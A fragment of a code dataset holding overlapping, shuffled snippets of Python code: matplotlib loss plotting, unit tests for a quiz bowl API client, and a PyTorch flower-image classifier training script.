# Choose X & Z position according", "color = ret if not status or not obj_found: try_without_success += 1 continue", "robot goes at the end of its process sleep_joints = [0.0, 0.55, -1.2,", "0 count_dict = { \"BLUE\": 0, \"RED\": 0, \"GREEN\": 0, } # Loop" ]
[ "train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors,", "plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None:", "None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss", "det er nok fint at have den udenfor men w/e train_loss_plot, = plt.plot(", "not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf()", "history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path", "val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is", "if not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name))", "nok fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss,", "label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf()", "name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\")", "with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss =", "plt.ion() # Ved ikke om man skal gøre det i hvert loop, det", "= plt.plot( loss_range, train_loss, label='Training Loss') 
val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss')", "path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss =", "hvert loop, det er nok fint at have den udenfor men w/e train_loss_plot,", "Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw:", "history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\")", "plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not None: with", "plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with", "def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs):", "have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot,", "loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path", "intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss'])", "plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is", "draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range", "import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = 
history.history['val_loss'] plt.style.use('bmh')", "fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training", "from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss']", "[] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke", "is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False):", "= [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss))", "loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i", "= history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-',", "'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path =", "plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh')", "plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if", "val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not None: with cd(path):", "at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss')", "Ved ikke om man skal gøre det i hvert loop, det er nok", "import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors =", "def save_hist_plot(history, name=\"test\", path=None): 
train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors,", "train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path", "if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name,", "val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path):", "'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name))", "def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man", "val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det", "label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not", "os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss", "plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors =", "er nok fint at have den udenfor men w/e train_loss_plot, = plt.plot( loss_range,", "range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i hvert loop,", "matplotlib.pyplot as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None):", "path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)),", "gøre det i hvert loop, det er nok fint at 
have den udenfor", "val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend()", "ikke om man skal gøre det i hvert loop, det er nok fint", "val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() #", "udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot(", "plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() return drawer", "plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om", "den udenfor men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, =", "plt.legend() if path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def", "drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal", "CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors", "i hvert loop, det er nok fint at have den udenfor men w/e", "train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre", "train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation", "= os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = []", "# Ved ikke om man skal 
gøre det i hvert loop, det er", "skal gøre det i hvert loop, det er nok fint at have den", "draw: plt.show() plt.pause(0.001) if path is not None: with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() return", "= [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion() # Ved", "det i hvert loop, det er nok fint at have den udenfor men", "as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors", "save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-',", "os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)),", "loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot])", "label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001) if path is not", "path is None: path = os.getcwd()+\"/Data\" with cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None,", "path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss'])", "plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot,", "= range(len(train_loss)) plt.ion() # Ved ikke om man skal gøre det i hvert", "loop, det er nok fint at have den udenfor men w/e train_loss_plot, =", "= plt.plot( loss_range, val_loss, 
label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show() plt.pause(0.001)", "man skal gøre det i hvert loop, det er nok fint at have", "w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss,", "plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = [] plt.style.use('bmh') def", "men w/e train_loss_plot, = plt.plot( loss_range, train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range,", "train_loss, label='Training Loss') val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if", "om man skal gøre det i hvert loop, det er nok fint at", "label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if path is None: path = os.getcwd()+\"/Data\"", "cd(path): plt.savefig(\"Train_val_graph_{}\".format(name)) plt.clf() def intermediate_drawer(name, path=None, draw=False): train_loss = [] val_loss = []", "= history.history['val_loss'] plt.style.use('bmh') plt.plot(range(len(train_errors)), train_errors, 'g-', label=\"Train\") plt.plot(range(len(val_errors)), val_errors, 'r-', label=\"Val\") plt.legend() if", "cd import os def save_hist_plot(history, name=\"test\", path=None): train_errors = history.history['loss'] val_errors = history.history['val_loss']", "[] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range = range(len(train_loss)) plt.ion()", "train_loss = [] val_loss = [] plt.style.use('bmh') def drawer(logs): train_loss.append(logs['loss']) val_loss.append(logs['val_loss']) loss_range =", "val_loss_plot, = plt.plot( loss_range, val_loss, label='Validation loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: plt.show()", "loss') plt.legend(handles=[train_loss_plot, val_loss_plot]) if not draw: 
plt.show() plt.pause(0.001) if path is not None:", "import matplotlib.pyplot as plt from CuteFlower2.data_loading import cd import os def save_hist_plot(history, name=\"test\"," ]
[ "= client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID,", "> 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0)", "self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length", "= 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client", "client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def", "= client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID,", "QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int)", "client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self):", "client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0)", "USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client", "word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID,", "= 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID,", "client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, 
USER_ID, API_KEY)", "str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf')", "test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def", "client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1')", "client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res", "QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self):", "client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0)", "False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1') self.assertRaises(ValueError, client.submit_answer(0, 'answer2'))", "unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def", "= 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs =", "API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client =", "> 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length,", "0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int)", "USER_ID, API_KEY) q_length = 
client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client", "USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL,", "res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res,", "QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client", "0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client =", "BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL,", "API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs", "API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID,", "int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length =", "import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0", "def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs", "= QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self):", "num_qs = 
client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL,", "client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY =", "<filename>web/test/test_client.py from client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1'", "API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL,", "import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase):", "test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w)", "test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs >", "from client import QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY", "= QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def", "self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0)", "self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word", "q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL,", "self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0,", "self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) 
client.submit_answer(0, 'answer1') self.assertRaises(ValueError, client.submit_answer(0,", "def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False)", "int) self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word =", "class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs,", "def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length", "= QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def", "0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w,", "QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client =", "0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY) res =", "= client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "= client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0,", "= QbApi(BASE_URL, USER_ID, API_KEY) res = client.submit_answer(0, 'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client", "USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self):", 
"'abcasdfasdfasdf') self.assertEqual(res, False) def test_submit_answer_duplicate(self): client = QbApi(BASE_URL, USER_ID, API_KEY) client.submit_answer(0, 'answer1') self.assertRaises(ValueError,", "'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY)", "USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str) self.assertTrue(w) def test_submit_answer_success(self): client =", "QbApi import unittest USER_ID = 0 BASE_URL = 'http://127.0.0.1:5000/qb-api/v1' API_KEY = 0 class", "test_get_question_length(self): client = QbApi(BASE_URL, USER_ID, API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length >", "QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions() self.assertIsInstance(num_qs, int) self.assertTrue(num_qs > 0) def test_get_question_length(self):", "API_KEY) q_length = client.get_question_length(0) self.assertIsInstance(q_length, int) self.assertTrue(q_length > 0) def test_get_word(self): client =", "0 class QuizBowlClientTests(unittest.TestCase): def test_get_num_questions(self): client = QbApi(BASE_URL, USER_ID, API_KEY) num_qs = client.get_num_questions()", "self.assertTrue(q_length > 0) def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0,", "def test_get_word(self): client = QbApi(BASE_URL, USER_ID, API_KEY) word = client.get_word(0, 0) self.assertIsInstance(w, str)" ]
[ "hidden else: print('No number of hidden inputs specified. Fallback to default inputs: 1024')", "set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer =", "classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def", "Sets the device based on the parameter. Also handles most edge-cases. Returns the", "nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output',", "parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout', type=float,", "save(model, train_data, epochs, architecture): ''' Saves the model to the given path. '''", "available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU')", "outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct +=", "torchvision.models as strings: vgg16 and densenet121 supported.') parser.add_argument('--learning_rate', type=float, help='Learning Rate for our", "architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model", "in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()),", "nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion", "def save(model, train_data, epochs, architecture): ''' Saves the model to the given path.", "Saves the model to the given path. 
''' model.class_to_idx = train_data.class_to_idx if epochs:", "OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes in command-line", "= learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate =", "Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test", "transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'],", "with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3)", "for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our", "labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs)", "else: print('No dropout specified. Fallback to default dropout: 0.05') dropout = 0.05 for", "transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir,", "1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified.", "epochs = 1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss", "model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps %", "images.to(device), labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0)", "help='Learning Rate for our Neural Network. 
Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units", "{}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else: print('No", "0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets", "for train, test and validation. Also loads dataloaders for all three in the", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu:", "\\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model", "model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint,", "'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file)", "1 print('Training Model for {} epochs'.format(epochs)) for e in range(epochs): running_loss = 0", "'/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224,", "to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu':", "model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model,", "not available; using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using", 
